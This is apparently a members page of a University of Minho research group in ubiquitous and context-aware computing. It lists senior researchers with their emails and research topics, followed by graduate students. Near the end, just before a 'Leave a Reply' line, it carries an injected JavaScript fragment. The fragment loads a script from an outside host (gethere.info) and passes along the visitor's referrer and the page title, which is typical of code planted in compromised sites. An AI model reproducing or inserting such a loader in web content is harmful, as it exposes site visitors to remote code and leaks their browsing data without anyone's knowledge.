Members

Senior researchers

Adriano Moreira web site
Adriano Moreira Photo Associate Prof.
adriano@dsi.uminho.pt
Urban computing, wireless networks, geographic models
Filipe Meneses web site
Filipe Meneses Photo Invited Assistant Prof.
meneses@dsi.uminho.pt
location, context management, context reasoning
Helena Rodrigues web site
Helena Rodrigues Photo Assistant Prof.
helena@dsi.uminho.pt
smart spaces, middleware, software architectures
Maria João Nicolau web site
Maria João Nicolau Photo Assistant Prof.
joao@dsi.uminho.pt
communication networks, routing protocols
Nuno Otero web site
Nuno Otero Photo Research Associate
nuno.otero@dsi.uminho.pt
Interaction Design
Rui José web site
Rui José Photo Assistant Prof.
rui@dsi.uminho.pt
Middleware, Applications
Jason Pascoe web site
Jason Pascoe Photo Post-doc researcher
giraffeJason@yahoo.co.uk
mobile computing, context-aware computing, ubiquitous/pervasive computing, mobile HCI.
Fernando Ribeiro web site
Fernando Ribeiro Photo Adjunct Prof.
fribeiro@ipcb.pt
ubiquitous computing , context-aware systems, environment intelligence, pervasive advertising and public displays systems
  

Graduate students and Research assistants

Abel Jorge Ferreira Barbosa Soares Short bio
Adriana Marilisa Machado da Silva Magalhães Short bio
Ana Luísa Rego Melro Short bio
André Feliciano Quintas da Silva Coelho Short bio
Ângelo Alves Short bio
Ângelo Conde Short bio
Arlindo Santos Short bio
Arménio Antunes Short bio
Bruno Silva Short bio
Carlos Penichet Short bio
Helder Pinto Short bio
Henrique Lima Short bio
Hugo Seixas Short bio
João Peixoto Short bio
Jorge Cardoso Short bio
Karim Keramat Jahromi Short bio
Karolina Baras Short bio
Luis Ferreira Short bio
Luiz Fernando Vilar Lopes Short bio
Manuel Pereira Short bio
Mário José Matos Braga Short bio
Miguel Andrade Short bio
Nelson Gonçalves Short bio
Nelson Marques Short bio
Nuno Salgado Short bio
Nuno Vasco Lopes Short bio
Olga Sergeevna Costa Ferreira Short bio
Pedro Coutinho Short bio
Ricardo Ferreira Short bio
Ricardo Mota Short bio
Samih Eisa Suliman Short bio
Samuel da Silva Moreira Short bio
Sandro Machado Short bio
Taivan Constantin Short bio

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Leave a Reply